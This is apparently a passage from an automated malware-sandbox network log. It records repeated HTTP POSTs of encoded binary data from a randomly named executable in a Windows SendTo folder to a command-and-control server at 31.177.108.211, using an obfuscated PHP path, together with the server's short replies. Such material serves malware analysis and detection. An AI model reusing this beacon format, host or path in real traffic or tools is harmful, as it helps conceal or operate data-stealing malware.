                                          Sep 13, 2024 21:02:54.047341108 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:53 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:02:54.232031107 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:54.471155882 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:54.907582998 CEST | 349 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:54 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0e 29 25 3b 57 33 05 01 52 2f 3d 0b 0e 27 01 28 5d 3c 33 32 19 2b 04 2b 01 2e 2a 2e 59 33 05 2d 5b 24 05 3c 01 33 01 06 0a 29 2a 2e 46 0d 1d 26 01 29 01 06 1f 3d 00 23 01 33 3e 0c 05 37 33 24 04 25 2c 33 1c 23 02 0c 59 37 0c 20 0f 27 2a 29 5d 2f 35 32 5e 3e 1f 26 59 23 1c 2e 55 0f 15 39 53 32 08 35 09 28 0c 38 03 3d 01 35 0d 31 3f 23 1e 32 05 0d 0b 33 5e 26 52 25 01 39 10 26 21 0d 5d 28 03 25 1d 21 21 0f 0b 21 3b 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:)%;W3R/='(]<32++.*.Y3-[$<3)*.F&)=#3>73$%,3#Y7 '*)]/52^>&Y#.U9S25(8=51?#23^&R%9&!](%!!!;'T#(V3YT0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          22 | 192.168.2.4 | 56690 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:52.531744003 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:52.878978968 CEST | 2532 | OUT | Data Raw: 5b 56 46 53 50 43 59 53 59 5f 51 51 52 50 54 57 5a 5a 5a 5b 55 52 53 48 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [VFSPCYSY_QQRPTWZZZ[URSHPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:?57%\7#-X)6=/)Z)8(P)?:Y$01*81(^19[&!^-
                                          Sep 13, 2024 21:02:53.433398962 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:53.560600042 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:53 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          23 | 192.168.2.4 | 56691 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:53.697665930 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2528
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:54.232038975 CEST | 2528 | OUT | Data Raw: 5b 57 43 53 55 47 5c 56 59 5f 51 51 52 59 54 52 5a 5f 5a 51 55 51 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [WCSUG\VY_QQRYTRZ_ZQUQSBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+/42!X##Z>V(?"++<P+<>'3'%:@$/%9[&!^-'
                                          Sep 13, 2024 21:02:54.450277090 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:54.584763050 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:54 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          24 | 192.168.2.4 | 56692 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:54.714803934 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:55.066536903 CEST | 2532 | OUT | Data Raw: 5e 55 43 53 50 44 5c 55 59 5f 51 51 52 58 54 5a 5a 5f 5a 50 55 54 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^UCSPD\UY_QQRXTZZ_ZPUTS@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:?:Z#%^ )[>]:+<>>(4Q(,-$07$:@2&;9[&!^-'
                                          Sep 13, 2024 21:02:55.494278908 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:55.655364037 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:55 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          25 | 192.168.2.4 | 56693 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:55.839740038 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:56.191507101 CEST | 2532 | OUT | Data Raw: 5b 5f 46 53 55 41 5c 57 59 5f 51 51 52 5d 54 5b 5a 52 5a 5a 55 56 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [_FSUA\WY_QQR]T[ZRZZUVSBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9@<<*#T> %)+*(-_*80T(/*Z3'%:D$?;%9[&!^-3
                                          Sep 13, 2024 21:02:56.575354099 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:56.734886885 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:56 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:02:56.958065033 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:56 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          26 | 192.168.2.4 | 56694 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:56.984200001 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:57.332153082 CEST | 2532 | OUT | Data Raw: 5e 54 46 51 50 46 5c 57 59 5f 51 51 52 5f 54 52 5a 5d 5a 5c 55 51 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^TFQPF\WY_QQR_TRZ]Z\UQSEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9("41> 3:>]-?%_)(V<<*3(%*$&? 1;9[&!^-;
                                          Sep 13, 2024 21:02:57.770236015 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:57.844551086 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:57 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          27 | 192.168.2.4 | 56695 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:58.003643990 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:58.347904921 CEST | 2532 | OUT | Data Raw: 5e 55 43 50 50 47 5c 57 59 5f 51 51 52 5e 54 50 5a 5e 5a 51 55 56 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^UCPPG\WY_QQR^TPZ^ZQUVS@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:?/1 2=X#Z*+:T+* (!3+28%(&9[&!^-
                                          Sep 13, 2024 21:02:58.535315037 CEST | 1236 | OUT | Data Raw: 3f 05 3b 00 2b 57 0f 41 35 3e 01 1f 02 3b 56 3e 38 04 0c 3a 0b 3d 0a 12 39 3c 1e 08 31 3f 3d 27 3f 0a 2e 0c 22 5a 3f 55 31 2c 06 5c 08 5b 14 3b 38 09 0a 04 27 00 5f 53 37 3e 03 2b 23 21 2c 3e 27 36 3a 23 03 1c 5e 1f 33 33 39 21 20 20 56 27 3b 06
                                          Data Ascii: ?;+WA5>;V>8:=9<1?='?."Z?U1,\[;8'_S7>+#!,>'6:#^339! V';")9 9V219=Y9!9?$*>]9=&[] #7YYU6V? W91,%Y;;88)2->> >V38._>"?Z-!T!<W 1:90 =333>+5#=+.%<3:Y*_=8&D>9 788[2Y6>4;E
                                          Sep 13, 2024 21:02:58.925816059 CEST | 1236 | OUT | Data Raw: 5e 55 43 50 50 47 5c 57 59 5f 51 51 52 5e 54 50 5a 5e 5a 51 55 56 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^UCPPG\WY_QQR^TPZ^ZQUVS@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:?/1 2=X#Z*+:T+* (!3+28%(&9[&!^-
                                          Sep 13, 2024 21:02:59.310674906 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:59.311574936 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:59.312273026 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:59.312897921 CEST | 1296 | OUT | Data Raw: 04 3f 17 1a 3d 0b 06 51 3e 39 20 05 24 3c 01 0b 3f 2d 45 5b 31 06 21 3b 09 3c 52 19 37 02 2c 3d 3c 06 2a 3f 3f 07 24 3a 0a 5b 0b 02 32 21 36 30 30 1e 1a 13 3d 04 06 36 05 05 35 3b 3f 05 3b 00 2b 57 0f 41 35 3e 01 1f 02 3b 56 3e 38 04 0c 3a 0b 3d
                                          Data Ascii: ?=Q>9 $<?-E[1!;<R7,=<*??$:[2!600=65;?;+WA5>;V>8:=9<1?='?."Z?U1,\[;8'_S7>+#!,>'6:#^339! V';")9 9V219=Y9!9?$*>]9=&[] #7YYU6V? W91,%Y;;88)2->> >V38._>"?Z-!T!<W
                                          Sep 13, 2024 21:02:59.694792986 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:59 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          28 | 192.168.2.4 | 56696 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:59.821613073 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          29 | 192.168.2.4 | 56697 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:59.917995930 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:00.670336008 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:00.804676056 CEST | 349 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:00 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          30 | 192.168.2.4 | 56698 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:00.039376020 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:00.806051970 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:00.961168051 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:00 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          31 | 192.168.2.4 | 56699 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:01.096824884 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:01.866187096 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:02.000488997 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:01 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          32 | 192.168.2.4 | 56700 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:02.225126982 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:02.966633081 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:03.100908041 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:02 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          33 | 192.168.2.4 | 56702 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:03.238744974 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:04.034991026 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:04.193108082 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:04 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          34 | 192.168.2.4 | 56703 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
